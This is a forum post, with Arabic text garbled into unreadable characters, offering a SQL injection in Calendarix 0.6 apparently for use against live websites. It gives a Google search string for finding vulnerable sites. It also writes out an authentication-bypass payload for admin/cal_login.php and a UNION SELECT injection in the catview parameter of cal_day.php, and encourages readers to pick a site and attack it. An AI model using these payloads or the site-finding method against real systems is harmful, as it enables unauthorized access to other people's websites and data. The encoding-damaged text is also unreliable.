Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ËÛÑå ÌÏíÏå Ýí ÇáÊÞæÇíã


ÓÑíå ÓÝíÇä Èä ÚæÝ ÇáÛÇãÏí ááÌåÇÏ ÇáßÊÑæäí

Status: Offline
Posts: 632
Date:
ËÛÑå ÌÏíÏå Ýí ÇáÊÞæÇíã
Permalink   
 





ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå

ÌÇíÈ ËÛÑå ÃäÔÇÁ ÊÚÌÈßã æåí ÌÏíÏå


ÊÇÑíÎ ÇáËÛÑå 2006.01.26

äæÚåÇ ãä SQL Injection

ÎØæÑÊåÇ ãÊæÓØå

ÇáãáÝ ÇáãÕÇÈ Calendarix0.6

ãÚáæãÇÊ Úä ÇáËÛÑå
Vulnerable scripts:
cal_functions.inc.php
admin/cal_login.php

Variables $catview(cal_functions.inc.php) $login(admin/cal_login.php) isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Authentication bypass is possible.

Condition for Authentication bypass: gpc_magic_quotes - off

ØÑíÞå ÇáÃÓÊÛáÇá

ÃÈÍË ÈÌæÌá Úä


ßæÏ:Calendarix0.6.20050830


ÈäÙåÑ ãæÇÞÚ ßÊíÑ

ØÈÚÇð ÃÎÊÑ ãæÞÚ æÈÊÎÔ Úáì ÇáÊÞæíã Úáì Øæá

ØÈÚÇð ÃÏÇ ãÇ ÌÇÊ ÕÝÍÉ ÇáÊÞæíã ÝÇáËÛÑå ÛíÑ ãæÌæÏå æßãÇä áÇÒã íßæä gpc_magic_quotes - off


æÊæÌÏ ØÑíÞÊíä ááÃÓÊÛáÇá
1. Authentication Bypass

ÊÖíÝ


ßæÏ:admin/cal_login.php


ÇáíæÒÑäíã


ßæÏ:' or 1/*


æÇáÈÇÓæÑÏ Ãí ÔíÁ

2. SQL-Injection

ÖíÝ


ßæÏ:cal_day.php? op=day&date=2006-01-10&catview=99% 20union%20select% 2012345


 

 

http://www.google.com.sa/search?hl=ar&safe=active&q=++Calendarix+0.6.20050830&btnG=%D8%A7%D8%A8%D8%AD%D8%AB&meta=ØÈÚÇ áÇ ÍÙ ÇáÊÇÑíÎ æÑÞã ÇáÖæíå ÛíÑåã


__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard